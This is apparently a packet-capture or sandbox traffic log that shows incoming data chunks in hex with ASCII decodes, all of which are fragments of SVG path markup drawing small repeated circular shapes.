                                                                                                                                                                              2023-09-15 05:27:43 UTC3603INData Raw: 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 32 2e 38 31 2c 33 39 30 2e 33 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 32 2e 38 39 2c 33 38 31 2e 36 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35
                                                                                                                                                                              Data Ascii: 1,0,3.58"/><path class="cls-9" d="M722.81,390.36a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M722.89,381.68a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35
                                                                                                                                                                              2023-09-15 05:27:43 UTC3619INData Raw: 39 22 20 64 3d 22 4d 37 35 37 2e 35 35 2c 34 35 31 2e 34 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 36 32 2c 34 34 32 2e 37 36 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e
                                                                                                                                                                              Data Ascii: 9" d="M757.55,451.44a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M757.62,442.76a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.
                                                                                                                                                                              2023-09-15 05:27:43 UTC3635INData Raw: 32 2c 32 36 39 2e 33 39 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36
                                                                                                                                                                              Data Ascii: 2,269.39a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.6
                                                                                                                                                                              2023-09-15 05:27:43 UTC3651INData Raw: 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 34 34 2c 33 32 31 2e 37 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38
                                                                                                                                                                              Data Ascii: 1.09,2.76,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M820.44,321.78a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58
                                                                                                                                                                              2023-09-15 05:27:43 UTC3667INData Raw: 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 35 2e 31 37 2c 33 38 32 2e 38 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73
                                                                                                                                                                              Data Ascii: ,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M855.17,382.86a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls
                                                                                                                                                                              2023-09-15 05:27:43 UTC3683INData Raw: 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 39 2e 39 31 2c 34 34 33 2e 39 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 39 30 2c 34 33 35 2e 32 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e
                                                                                                                                                                              Data Ascii: ,2.82,2.82,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"/><path class="cls-9" d="M889.91,443.93a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.2,2.64,2.64,0,0,1,0,3.57"/><path class="cls-9" d="M890,435.25a2.16,2.16,0,0,1-1.
                                                                                                                                                                              2023-09-15 05:27:43 UTC3699INData Raw: 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 38 2c 32 36 31 2e 38 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 38 2e 30 36 2c 32 35 33 2e 32 31 41 32 2e 31 35 2c 32 2e
                                                                                                                                                                              Data Ascii: ,.8-3.58,2.81,2.81,0,0,1,3.61.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M918,261.89a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M918.06,253.21A2.15,2.
                                                                                                                                                                              2023-09-15 05:27:43 UTC3715INData Raw: 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 35 32 2e 37 32 2c 33 32 33 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 35 32 2e 38 2c 33 31 34 2e 32 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c
                                                                                                                                                                              Data Ascii: ,3.62.19,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M952.72,323a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M952.8,314.28a2.16,2.16,0,0,1-1.1,2.75,3.14,
                                                                                                                                                                              2023-09-15 05:27:43 UTC3731INData Raw: 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 38 37 2c 32 36 30 2e 34 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 35 38 2c 32 35 31 2e 36 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d
                                                                                                                                                                              Data Ascii: class="cls-7" d="M59.87,260.41a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M59.58,251.63a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-
                                                                                                                                                                              2023-09-15 05:27:43 UTC3747INData Raw: 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 39 37 2e 33 33 2c 33 31 31 2e 38 37 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 39 37 2c 33 30 33 2e 30 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e
                                                                                                                                                                              Data Ascii: 1,3.66.05,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M97.33,311.87a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M97,303.09a2.19,2.19,0,0,1-1,2.83,3.18,3.
                                                                                                                                                                              2023-09-15 05:27:44 UTC3763INData Raw: 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 38 35 2c 31 32 36 2e 36 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 35 36 2c 31 31 37 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36
                                                                                                                                                                              Data Ascii: <path class="cls-7" d="M117.85,126.61a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.67,2.67,0,0,1,.19,3.61"/><path class="cls-7" d="M117.56,117.83a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.6
                                                                                                                                                                              2023-09-15 05:27:44 UTC3779INData Raw: 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2e 36 31 2c 31 38 36 2e 38 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2e 33 31 2c 31 37 38 2e 30 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e
                                                                                                                                                                              Data Ascii: ,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M155.61,186.86a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.2,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M155.31,178.08a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.
                                                                                                                                                                              2023-09-15 05:27:44 UTC3795INData Raw: 33 37 2c 32 34 37 2e 31 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 33 2e 30 37 2c 32 33 38 2e 33 32 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30
                                                                                                                                                                              Data Ascii: 37,247.1a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M193.07,238.32a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0
                                                                                                                                                                              2023-09-15 05:27:44 UTC3811INData Raw: 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 31 2e 31 32 2c 33 30 37 2e 33 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 30 2e 38 33 2c 32 39 38 2e 35 37 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 34 2e
                                                                                                                                                                              Data Ascii: ,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M231.12,307.35a2.16,2.16,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M230.83,298.57a2.19,2.19,0,0,1-1,2.83,3.2,3.2,0,0,1-4.
                                                                                                                                                                              2023-09-15 05:27:44 UTC3827INData Raw: 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 35 31 2e 36 34 2c 31 32 32 2e 30 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 35 31 2e 33 35 2c 31 31 33 2e 33 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c
                                                                                                                                                                              Data Ascii: 69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M251.64,122.08a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M251.35,113.31a2.17,2.17,0,0,1-1,2.82,3.18,3.18,0,0,
                                                                                                                                                                              2023-09-15 05:27:44 UTC3843INData Raw: 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 38 39 2e 34 2c 31 38 32 2e 33 33 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 38 39 2e 31 2c 31 37 33 2e 35 35 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39
                                                                                                                                                                              Data Ascii: 7,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M289.4,182.33a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M289.1,173.55a2.17,2.17,0,0,1-1,2.83,3.19
                                                                                                                                                                              2023-09-15 05:27:44 UTC3859INData Raw: 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 32 37 2e 31 36 2c 32 34 32 2e 35 37 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 32 36 2e 38 36 2c 32 33 33 2e 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c
                                                                                                                                                                              Data Ascii: .87,2.87,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M327.16,242.57a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M326.86,233.8a2.17,2.17,0,0,
